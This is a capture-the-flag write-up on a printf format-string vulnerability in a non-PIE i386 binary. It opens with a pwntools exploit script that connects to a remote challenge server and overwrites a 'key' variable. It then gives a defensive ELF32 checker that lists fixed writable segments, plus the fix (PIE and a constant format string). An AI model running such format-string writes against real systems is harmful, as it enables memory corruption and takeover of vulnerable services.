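The binary ships with a backdoor and PIE is disabled, so the printf format string vulnerability can be used directly to write the required value into key.
from pwn import *
context(arch='i386', log_level = 'debug')  # set the target architecture before building the payload
p = remote('www.bmzclub.cn', 21355)
payload = fmtstr_payload(12, {0x0804a048: 35795746})  # offset 12; key = xxxx
p.sendline(payload)
p.interactive()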
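The write is reliable because a non-PIE binary keeps `key` at the same address (0x0804a048) on every run. As an added example (not part of the original writeup), this defender-side check parses an ELF32 header and lists the writable segments whose addresses are fixed. The sample image and its segment layout are constructed, and `fixed_writable_ranges` and `build_sample` are hypothetical names.

```python
import struct

ET_EXEC, ET_DYN = 2, 3      # e_type values from the ELF specification
PT_LOAD, PF_W = 1, 2        # loadable segment type / writable flag


def fixed_writable_ranges(elf: bytes):
    """Return (position_independent, [(start, end), ...]) for ELF32 LE.

    For ET_EXEC (non-PIE) images the ranges are writable segments that
    are mapped at the same virtual address on every run.
    """
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("only ELF32 little-endian is handled here")
    e_type, = struct.unpack_from("<H", elf, 16)
    e_phoff, = struct.unpack_from("<I", elf, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
    if e_type == ET_DYN:
        # PIE executable or shared object: base is chosen at load time.
        return True, []
    if e_type != ET_EXEC:
        raise ValueError("not an executable image")
    ranges = []
    for i in range(e_phnum):
        p_type, _, vaddr, _, _, memsz, flags, _ = struct.unpack_from(
            "<8I", elf, e_phoff + i * e_phentsize)
        if p_type == PT_LOAD and flags & PF_W:
            ranges.append((vaddr, vaddr + memsz))
    return False, ranges


def build_sample(e_type: int) -> bytes:
    """Constructed image: 52-byte ELF32 header plus one RW PT_LOAD."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0x08048400,
                               52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<8I", PT_LOAD, 0x1000, 0x0804a000, 0x0804a000,
                       0x40, 0x60, 6, 0x1000)  # flags 6 = read + write
    return ehdr + phdr


if __name__ == "__main__":
    pie, ranges = fixed_writable_ranges(build_sample(ET_EXEC))
    print("position independent:", pie)
    print("fixed writable ranges:", [(hex(a), hex(b)) for a, b in ranges])
```

Building with `-fPIE -pie` turns the image into ET_DYN, so the fixed ranges disappear; the root fix is still to pass user input as an argument, `printf("%s", buf)`, never as the format string.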